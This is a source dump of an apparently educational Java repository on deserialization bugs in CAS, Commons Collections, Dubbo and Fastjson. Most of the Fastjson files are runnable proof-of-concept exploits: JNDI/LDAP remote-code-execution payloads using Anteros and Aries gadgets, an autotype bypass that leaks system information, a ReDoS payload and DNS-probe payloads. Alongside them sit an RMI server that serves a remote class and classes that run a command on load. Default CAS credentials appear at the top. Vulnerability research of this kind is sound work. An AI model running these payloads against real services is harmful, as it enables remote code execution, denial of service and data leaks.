--------------------------------------------------------------------------------
1 | 账号:casuser
2 | 密码:Mellon
--------------------------------------------------------------------------------
/cas/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | learn-java-bug
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | cas
13 | pom
14 |
15 | 4.1.x-4.1.6
16 | 5.x
17 | 4.1.7-4.2.x
18 | CAS4PaddingOracleCBC
19 |
20 |
21 |
22 |
23 | org.apache.commons
24 | commons-collections4
25 | 4.0
26 |
27 |
28 |
29 | com.mchange
30 | c3p0
31 | 0.9.5.2
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/cas/src/main/java/com/threedr3am/bug/cas/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * 想学CAS源码,建议先去学习Spring webflow,
4 | * 若是maven编译,找不到com.xyh.**等包,则先在maven面板,执行learn-java-bug->Lifecycle->package
5 | *
6 | * @author threedr3am
7 | */
8 | package com.threedr3am.bug.cas;
--------------------------------------------------------------------------------
/common-collections/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 | learn-java-bug
7 | com.xyh
8 | 1.0-SNAPSHOT
9 |
10 | 4.0.0
11 |
12 | common-collections
13 |
14 |
15 |
16 |
17 | commons-collections
18 | commons-collections
19 | 3.2.1
20 |
21 |
22 |
23 | com.xyh
24 | common
25 | 1.0-SNAPSHOT
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/common-collections/src/main/java/com/threedr3am/bug/collections/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * @author xuanyh
3 | */
4 | package com.threedr3am.bug.collections;
--------------------------------------------------------------------------------
/common-collections/src/main/java/com/threedr3am/bug/collections/v3/no2/CallbackRuntime.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.collections.v3.no2;
2 |
3 | import java.io.BufferedInputStream;
4 |
5 | /**
6 | * 抛异常回显执行命令
7 | *
8 | * Created by threedr3am on 2018/5/5.
9 | */
10 | public class CallbackRuntime {
11 | public void exec(String cmd) throws Throwable {
12 | BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
13 | StringBuilder stringBuilder = new StringBuilder();
14 | byte[] bytes = new byte[4096];
15 | int len = 0;
16 | while ((len = bufferedInputStream.read(bytes)) != -1)
17 | stringBuilder.append(new String(bytes));
18 | //此处最好不要使用Exception异常类,因为很多web项目可能会全局捕获该异常
19 | throw new Throwable(stringBuilder.toString());
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/common-collections/src/main/java/com/threedr3am/bug/collections/v3/no2/CallbackRuntime2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.collections.v3.no2;
2 |
3 | import java.io.BufferedInputStream;
4 |
5 | /**
6 | * 利用加载时自动执行 & 抛异常回显
7 | *
8 | * Created by threedr3am on 2018/5/5.
9 | */
10 | public class CallbackRuntime2 {
11 | public static String exec(String cmd) {
12 | try {
13 | BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
14 | StringBuilder stringBuilder = new StringBuilder();
15 | byte[] bytes = new byte[4096];
16 | int len = 0;
17 | while ((len = bufferedInputStream.read(bytes)) != -1)
18 | stringBuilder.append(new String(bytes));
19 | bufferedInputStream.close();
20 | return stringBuilder.toString();
21 | } catch (Exception e) {
22 | e.printStackTrace();
23 | }
24 | return "";
25 | }
26 | static {
27 | if (true) {
28 | throw new RuntimeException(exec("/Applications/Calculator.app/Contents/MacOS/Calculator"));
29 | }
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/common-collections/src/main/java/com/threedr3am/bug/collections/v3/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * apache-common-collections3 漏洞学习
3 | *
4 | * @author threedr3am
5 | */
6 | package com.threedr3am.bug.collections.v3;
--------------------------------------------------------------------------------
/common/src/main/java/Calc.java:
--------------------------------------------------------------------------------
1 | /**
2 | * @author threedr3am
3 | */
4 | public class Calc {
5 | static {
6 | try {
7 | System.out.println("run Calc...");
8 | Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
9 | } catch (Throwable e) {
10 | e.printStackTrace();
11 | }
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/common/src/main/java/com/threedr3am/bug/common/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * @author xuanyh
3 | */
4 | package com.threedr3am.bug.common;
--------------------------------------------------------------------------------
/common/src/main/java/com/threedr3am/bug/common/server/RmiServer.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.common.server;
2 |
3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
4 | import java.rmi.AlreadyBoundException;
5 | import java.rmi.RemoteException;
6 | import java.rmi.registry.LocateRegistry;
7 | import java.rmi.registry.Registry;
8 | import javax.naming.NamingException;
9 | import javax.naming.Reference;
10 |
11 | /**
12 | * rmi server
13 | *
14 | * @author threedr3am
15 | */
16 | public class RmiServer {
17 |
18 | public static void main(String[] args) {
19 | run();
20 | }
21 |
22 | public static void run() {
23 | try {
24 | Registry registry = LocateRegistry.createRegistry(43657);
25 | //TODO 把resources下的Calc.class 或者 自定义修改编译后target目录下的Calc.class 拷贝到下面代码所示http://host:port的web服务器根目录即可
26 | Reference reference = new Reference("Calc","Calc","http://localhost/");
27 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
28 | registry.bind("Calc",referenceWrapper);
29 | } catch (RemoteException e) {
30 | e.printStackTrace();
31 | } catch (AlreadyBoundException e) {
32 | e.printStackTrace();
33 | } catch (NamingException e) {
34 | e.printStackTrace();
35 | }
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/common/src/main/java/com/threedr3am/bug/common/server/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * 漏洞复现需要用到的server,例如:rmi、ldap
3 | *
4 | * @author threedr3am
5 | */
6 | package com.threedr3am.bug.common.server;
--------------------------------------------------------------------------------
/common/src/main/java/com/threedr3am/bug/common/utils/FileToByteArrayUtil.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.common.utils;
2 |
3 | import java.io.IOException;
4 | import java.io.InputStream;
5 |
6 | /**
7 | * Created by threedr3am on 2018/5/5.
8 | */
9 | public class FileToByteArrayUtil {
10 | /**
11 | * 读取class文件,转换为byte[]对象
12 | * @param classPath
13 | * @return
14 | * @throws IOException
15 | */
16 | public static byte[] readCallbackRuntimeClassBytes(String classPath) throws IOException {
17 | //执行前先编译CallbackRuntime类得到class文件
18 | InputStream inputStream = Thread.currentThread().getContextClassLoader().getResourceAsStream(classPath);
19 | byte[] bytes = new byte[inputStream.available()];
20 | inputStream.read(bytes);
21 | return bytes;
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/common/src/main/java/com/threedr3am/bug/common/utils/SerializeUtil.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.common.utils;
2 |
3 | import java.io.ByteArrayInputStream;
4 | import java.io.ByteArrayOutputStream;
5 | import java.io.ObjectInputStream;
6 | import java.io.ObjectOutputStream;
7 |
8 | /**
9 | * Created by threedr3am on 2018/5/5.
10 | */
11 | public class SerializeUtil {
12 | /**
13 | * 序列化
14 | *
15 | */
16 | public static byte[] serialize(Object o) throws Exception {
17 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
18 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
19 | objectOutputStream.writeObject(o);
20 | byte[] bytes = byteArrayOutputStream.toByteArray();
21 | objectOutputStream.close();
22 | return bytes;
23 | }
24 |
25 | /**
26 | * 反序列化
27 | *
28 | */
29 | public static T deserialize(byte[] bytes) throws Exception {
30 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
31 | ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
32 | T o = (T) objectInputStream.readObject();
33 | objectInputStream.close();
34 | return o;
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/common/src/main/java/com/threedr3am/bug/common/utils/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * 工具包
3 | *
4 | * @author threedr3am
5 | */
6 | package com.threedr3am.bug.common.utils;
--------------------------------------------------------------------------------
/common/src/main/java/org/apache/catalina/startup/Catalina.java:
--------------------------------------------------------------------------------
1 | //package org.apache.catalina.startup;
2 | //
3 | ///**
4 | // * @author threedr3am
5 | // */
6 | //public class Catalina {
7 | // static {
8 | // try {
9 | // System.out.println("run Calc...");
10 | // Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
11 | // } catch (Throwable e) {
12 | // e.printStackTrace();
13 | // }
14 | // }
15 | //}
16 |
--------------------------------------------------------------------------------
/common/src/main/resources/META-INF/services/javax.script.ScriptEngineFactory:
--------------------------------------------------------------------------------
1 | #CalcScriptEngineFactory
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | dubbo-hessian2-safe-reinforcement
8 | com.threedr3am
9 | 1.0-SNAPSHOT
10 |
11 |
12 | learn-dubbo-client-boot
13 | 0.0.1-SNAPSHOT
14 | learn-dubbo-client-boot
15 | Demo project for Spring Boot
16 |
17 |
18 | 1.8
19 |
20 |
21 |
22 |
23 | com.threedr3am
24 | learn-dubbo-server-boot
25 | 0.0.1-SNAPSHOT
26 |
27 |
28 |
29 |
30 |
31 |
32 | org.springframework.boot
33 | spring-boot-maven-plugin
34 |
35 |
36 |
37 |
38 |
39 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/java/com/threedr3am/learn/client/boot/LearnDubboClientBootApplication.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.client.boot;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class LearnDubboClientBootApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(LearnDubboClientBootApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/java/com/threedr3am/learn/client/boot/Test.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.client.boot;
2 |
3 | import com.threedr3am.learn.server.boot.A;
4 | import com.threedr3am.learn.server.boot.DemoService;
5 | import java.sql.SQLException;
6 | import javax.annotation.PostConstruct;
7 | import org.apache.dubbo.config.annotation.Reference;
8 | import org.springframework.stereotype.Service;
9 |
10 | /**
11 | * @author xuanyh
12 | */
13 | @Service
14 | public class Test {
15 |
16 | @Reference(version = "1.0")
17 | private DemoService demoService;
18 |
19 | @PostConstruct
20 | private void init() throws SQLException {
21 | A a = new A();
22 | a.setName("xuanyh");
23 | new Thread(() -> {
24 | while (true) {
25 | System.out.println(demoService.hello(a));
26 | try {
27 | Thread.currentThread().sleep(5000);
28 | } catch (InterruptedException e) {
29 | e.printStackTrace();
30 | }
31 | }
32 | }).start();
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/java/com/threedr3am/learn/serialize/MyHessian2Input.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.serialize;
2 |
3 | import com.alibaba.com.caucho.hessian.io.Hessian2Input;
4 | import java.io.IOException;
5 | import java.io.InputStream;
6 | import java.lang.reflect.Field;
7 | import java.util.List;
8 |
9 | /**
10 | * @author xuanyh
11 | */
12 | public class MyHessian2Input extends Hessian2Input {
13 |
14 | /**
15 | * Creates a new Hessian input stream, initialized with an underlying input stream.
16 | *
17 | * @param is the underlying input stream.
18 | */
19 | public MyHessian2Input(InputStream is) {
20 | super(is);
21 | }
22 |
23 | @Override
24 | public Object readObject(Class cl) throws IOException {
25 | return super.readObject(cl);
26 | }
27 |
28 | @Override
29 | public Object readObject(Class expectedClass, Class... expectedTypes) throws IOException {
30 | return super.readObject(expectedClass, expectedTypes);
31 | }
32 |
33 | @Override
34 | public Object readObject() throws IOException {
35 | return super.readObject();
36 | }
37 |
38 | @Override
39 | public Object readObject(List> expectedTypes) throws IOException {
40 | return super.readObject(expectedTypes);
41 | }
42 |
43 | void checkClassDef() {
44 | if (_classDefs.isEmpty())
45 | return;
46 | for (Object c : _classDefs) {
47 | Field[] fields = c.getClass().getDeclaredFields();
48 | System.out.println();
49 | }
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/resources/META-INF/dubbo/org.apache.dubbo.common.serialize.Serialization:
--------------------------------------------------------------------------------
1 | MyHessian2=com.threedr3am.learn.serialize.MyHessian2Serialization
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | spring.application.name=dubbo-consumer
2 | server.port=9990
3 | spring.main.allow-bean-definition-overriding=true
4 |
5 | # Dubbo Application
6 | # The default value of dubbo.application.name is ${spring.application.name}
7 | # dubbo.application.name=${spring.application.name}
8 |
9 | # 扫描dubbo服务(@Service.. @Reference..)
10 | dubbo.scan.basePackages=com.threedr3am.learn.client.boot
11 |
12 | # 注册中心
13 | dubbo.registry.id=dubboRegistry
14 | dubbo.registry.timeout=5000
15 | dubbo.registry.address=zookeeper://127.0.0.1:2181
16 | dubbo.registry.client=curator
17 | # 元数据地址
18 | dubbo.metadata-report.address=zookeeper://127.0.0.1:2181
19 |
20 |
21 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-client-boot/src/test/java/com/threedr3am/learn/client/boot/LearnDubboClientBootApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.client.boot;
2 |
3 | import org.junit.Test;
4 | import org.junit.runner.RunWith;
5 | import org.springframework.boot.test.context.SpringBootTest;
6 | import org.springframework.test.context.junit4.SpringRunner;
7 |
8 | //@RunWith(SpringRunner.class)
9 | //@SpringBootTest
10 | public class LearnDubboClientBootApplicationTests {
11 |
12 | @Test
13 | public void contextLoads() {
14 | }
15 |
16 | }
17 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | dubbo-hessian2-safe-reinforcement
8 | com.threedr3am
9 | 1.0-SNAPSHOT
10 |
11 |
12 | learn-dubbo-server-boot
13 | 0.0.1-SNAPSHOT
14 | learn-dubbo-server-boot
15 | Demo project for Spring Boot
16 |
17 |
18 | 1.8
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | org.springframework.boot
29 | spring-boot-maven-plugin
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/A.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.server.boot;
2 |
3 | import java.io.Serializable;
4 |
5 | /**
6 | * @author xuanyh
7 | */
8 | public class A implements Serializable {
9 |
10 | String name;
11 |
12 | public A() {
13 | System.out.println("A被实例化了");
14 | }
15 |
16 | public String getName() {
17 | return name;
18 | }
19 |
20 | public void setName(String name) {
21 | this.name = name;
22 | }
23 |
24 | @Override
25 | public boolean equals(Object obj) {
26 | System.out.println("A.equals");
27 | return super.equals(obj);
28 | }
29 |
30 | @Override
31 | public String toString() {
32 | System.out.println("A.toString");
33 | return super.toString();
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/B.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.server.boot;
2 |
3 | import java.io.Serializable;
4 |
5 | /**
6 | * @author xuanyh
7 | */
8 | public class B implements Serializable {
9 |
10 | String name;
11 |
12 | public B() {
13 | System.out.println("B被实例化了");
14 | }
15 |
16 | public String getName() {
17 | return name;
18 | }
19 |
20 | public void setName(String name) {
21 | this.name = name;
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/DemoService.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.server.boot;
2 |
3 | /**
4 | * @author xuanyh
5 | */
6 | public interface DemoService {
7 |
8 | String hello(A a);
9 | }
10 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/DemoServiceImpl.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.server.boot;
2 |
3 | import org.apache.dubbo.config.annotation.Service;
4 |
5 | /**
6 | * @author xuanyh
7 | */
8 | @Service(registry = "dubboRegistry", timeout = 3000, version = "1.0", retries = 3, loadbalance = "random", actives = 5)
9 | public class DemoServiceImpl implements DemoService {
10 |
11 | public String hello(A a) {
12 | return "hello! " + a.getName();
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/java/com/threedr3am/learn/server/boot/LearnDubboServerBootApplication.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.server.boot;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class LearnDubboServerBootApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(LearnDubboServerBootApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/resources/META-INF/dubbo/org.apache.dubbo.common.serialize.Serialization:
--------------------------------------------------------------------------------
1 | MyHessian2=com.threedr3am.learn.server.boot.serialize.MyHessian2Serialization
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | spring.application.name=service-provider
2 | server.port=9999
3 |
4 | spring.main.allow-bean-definition-overriding=true
5 | # 扫描dubbo服务(@Service.. @Reference..)
6 | dubbo.scan.basePackages=com.threedr3am.learn.server.boot
7 |
8 | # 通信协议
9 | dubbo.protocol.name=dubbo
10 | dubbo.protocol.port=20881
11 | #dubbo.protocol.server=tomcat
12 |
13 | # 注册中心
14 | dubbo.registry.id=dubboRegistry
15 | dubbo.registry.timeout=5000
16 | dubbo.registry.address=zookeeper://127.0.0.1:2181
17 | # Dubbo 支持 zkclient 和 curator 两种 Zookeeper 客户端实现:在2.7.x的版本中已经移除了zkclient的实现,如果要使用zkclient客户端,需要自行拓展
18 | dubbo.registry.client=curator
19 | # 元数据地址
20 | dubbo.metadata-report.address=zookeeper://127.0.0.1:2181
21 |
22 | dubbo.provider.serialization=MyHessian2
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/learn-dubbo-server-boot/src/test/java/com/threedr3am/learn/server/boot/LearnDubboServerBootApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.learn.server.boot;
2 |
3 | import org.junit.Test;
4 | import org.junit.runner.RunWith;
5 | import org.springframework.boot.test.context.SpringBootTest;
6 | import org.springframework.test.context.junit4.SpringRunner;
7 |
8 | //@RunWith(SpringRunner.class)
9 | //@SpringBootTest
10 | public class LearnDubboServerBootApplicationTests {
11 |
12 | @Test
13 | public void contextLoads() {
14 | }
15 |
16 | }
17 |
--------------------------------------------------------------------------------
/dubbo/dubbo-hessian2-safe-reinforcement/module-info:
--------------------------------------------------------------------------------
1 | /**
2 | * Dubbo Hessian反序列化安全加固demo
3 | *
4 | * @author threedr3am
5 | */
6 |
--------------------------------------------------------------------------------
/dubbo/src/main/java/com/threedr3am/bug/dubbo/rouge/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * Dubbo client attack demo
4 | *
5 | * 攻击Dubbo客户端的例子
6 | *
7 | * @author xuanyh
8 | */
9 | package com.threedr3am.bug.dubbo.rouge;
--------------------------------------------------------------------------------
/dubbo/src/main/java/com/threedr3am/bug/dubbo/support/NoWriteReplaceSerializerFactory.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.dubbo.support;
2 |
3 | import com.caucho.hessian.io.HessianProtocolException;
4 | import com.caucho.hessian.io.Serializer;
5 | import com.caucho.hessian.io.SerializerFactory;
6 | import com.caucho.hessian.io.UnsafeSerializer;
7 | import com.caucho.hessian.io.WriteReplaceSerializer;
8 |
9 | /**
10 | * @author xuanyh
11 | */
12 | public class NoWriteReplaceSerializerFactory extends SerializerFactory {
13 |
14 | /**
15 | * {@inheritDoc}
16 | *
17 | * @see SerializerFactory#getObjectSerializer(Class)
18 | */
19 | @Override
20 | public Serializer getObjectSerializer(Class cl) throws HessianProtocolException {
21 | return super.getObjectSerializer(cl);
22 | }
23 |
24 |
25 | /**
26 | * {@inheritDoc}
27 | *
28 | * @see SerializerFactory#getSerializer(Class)
29 | */
30 | @Override
31 | public Serializer getSerializer(Class cl) throws HessianProtocolException {
32 | Serializer serializer = super.getSerializer(cl);
33 |
34 | if (serializer instanceof WriteReplaceSerializer) {
35 | return UnsafeSerializer.create(cl);
36 | }
37 | return serializer;
38 | }
39 |
40 | }
41 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/Evil.java:
--------------------------------------------------------------------------------
1 | //import java.io.IOException;
2 | //import java.nio.charset.Charset;
3 | //import java.util.HashSet;
4 | //import java.util.Iterator;
5 | //
6 | ///**
7 | // * @author threedr3am
8 | // */
9 | //public class Evil extends java.nio.charset.spi.CharsetProvider {
10 | //
11 | // @Override
12 | // public Iterator charsets() {
13 | // return new HashSet().iterator();
14 | // }
15 | //
16 | // @Override
17 | // public Charset charsetForName(String charsetName) {
18 | // if (charsetName.startsWith("Evil")) {
19 | // try {
20 | // Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
21 | // } catch (IOException e) {
22 | // e.printStackTrace();
23 | // }
24 | // }
25 | // return Charset.forName("UTF-8");
26 | // }
27 | //}
28 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/Inet4AddressPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.dns;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 | /**
6 | * @author threedr3am
7 | */
8 | public class Inet4AddressPoc {
9 |
10 | public static void main(String[] args) {
11 | String payload = "{\"@type\":\"java.net.Inet4Address\",\"val\":\"dnslog\"}";
12 | try {
13 | JSON.parse(payload);
14 | } catch (Exception e) {
15 | e.printStackTrace();
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/Inet6AddressPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.dns;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 | /**
6 | * @author threedr3am
7 | */
8 | public class Inet6AddressPoc {
9 |
10 | public static void main(String[] args) {
11 | String payload = "{\"@type\":\"java.net.Inet6Address\",\"val\":\"dnslog\"}";
12 | try {
13 | JSON.parse(payload);
14 | } catch (Exception e) {
15 | e.printStackTrace();
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/InetSocketAddressPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.dns;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 | /**
6 | * @author threedr3am
7 | */
8 | public class InetSocketAddressPoc {
9 |
10 | public static void main(String[] args) {
11 | String payload = "{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"xxx.dns\"}, \"port\":80}";
12 | try {
13 | JSON.parse(payload);
14 | } catch (Exception e) {
15 | e.printStackTrace();
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/dns/URLPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.dns;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 | /**
6 | * @author threedr3am
7 | */
8 | public class URLPoc {
9 |
10 | public static void main(String[] args) {
11 | String payload = "{{\"@type\":\"java.net.URL\",\"val\":\"http://xxx.dns\"}:\"aaa\"}";
12 | try {
13 | JSON.parse(payload);
14 | } catch (Exception e) {
15 | e.printStackTrace();
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/dos/ReDOSPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.dos;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 | /**
6 | * 正则DOS Fastjson < 1.2.66
7 | *
8 | * @author threedr3am
9 | */
10 | public class ReDOSPoc {
11 |
12 | public static void main(String[] args) {
13 | String payload = "{\"aaaaa\":\"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\",\"regex\":{\"$ref\":\"$[aaaaa rlike '(x+)*y']\"}}";
14 | JSON.parse(payload);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/leak/seleniumBypassAutotype1_2_68.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.leak;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.JSONObject;
5 |
6 | /**
7 | * bypass autotype <= 1.2.68
8 | */
9 | public class seleniumBypassAutotype1_2_68 {
10 |
11 | public static void main(String[] args) {
12 |
13 | String payload = "\n"
14 | + "{\n"
15 | + " \"name\":\"tony\",\n"
16 | + " \"email\":\"tony@qq.com\",\n"
17 | + " \"content\":{\"$ref\":\"$x.systemInformation\"},\n"
18 | + " \"x\":{\n"
19 | + " \"@type\":\"java.lang.Exception\",\"@type\":\"org.openqa.selenium.WebDriverException\"\n"
20 | + " }\n"
21 | + "}";
22 | try {
23 | JSONObject jsonObject = JSON.parseObject(payload);
24 | System.out.println(jsonObject.getString("content"));
25 | } catch (Exception e) {
26 | e.printStackTrace();
27 | }
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * fastjson漏洞学习
3 | *
4 | * <= 1.2.24 默认AutoTypeSupport=true
5 | *
6 | * @author threedr3am
7 | */
8 | package com.threedr3am.bug.fastjson;
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/AnterosPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 |
7 | /**
8 | * fastjson <= 1.2.62 RCE,需要开启AutoType (report by threedr3am to 阿里云先知众测 - 内部已知)
9 | *
10 | * Anteros-DBCP依赖的gadget
11 | *
12 | *
13 | * com.codahale.metrics
14 | * metrics-healthchecks
15 | * 3.0.2
16 | *
17 | *
18 | *
19 | * br.com.anteros
20 | * Anteros-Core
21 | * 1.2.1
22 | *
23 | *
24 | *
25 | * br.com.anteros
26 | * Anteros-DBCP
27 | * 1.0.1
28 | *
29 | *
30 | * @author threedr3am
31 | */
32 | public class AnterosPoc {
33 | static {
34 | //rmi server示例
35 | // RmiServer.run();
36 |
37 | //ldap server示例
38 | LdapServer.run();
39 | }
40 |
41 | public static void main(String[] args) {
42 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
43 |
44 | String payload = "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";//ldap方式
45 | JSON.parse(payload);
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/AriesJMSPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 | import java.io.IOException;
7 |
8 | /**
9 | * todo 发现新的Fastjson利用面,通过$ref引用功能,可以任意触发大部分getter方法,理论可以通过此种方式RCE,还能在不开启AutoType的情况下,任意调用大部分当前反序列化对象的getter方法,若存在危险method,就能进行攻击
10 | *
11 | *
12 | * org.apache.aries.transaction
13 | * org.apache.aries.transaction.jms
14 | * 2.0.0
15 | *
16 | *
17 | * @author threedr3am
18 | */
19 | public class AriesJMSPoc {
20 |
21 | static {
22 | //rmi server示例
23 | // RmiServer.run();
24 |
25 | //ldap server示例
26 | LdapServer.run();
27 | }
28 |
29 | public static void main(String[] args) throws IOException {
30 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
31 |
32 | String json = "{\"@type\":\"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory\", \"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true, \"transactionManager\": {\"$ref\":\"$.transactionManager\"}}";
33 | JSON.parse(json);
34 | }
35 |
36 |
37 | }
38 |
--------------------------------------------------------------------------------
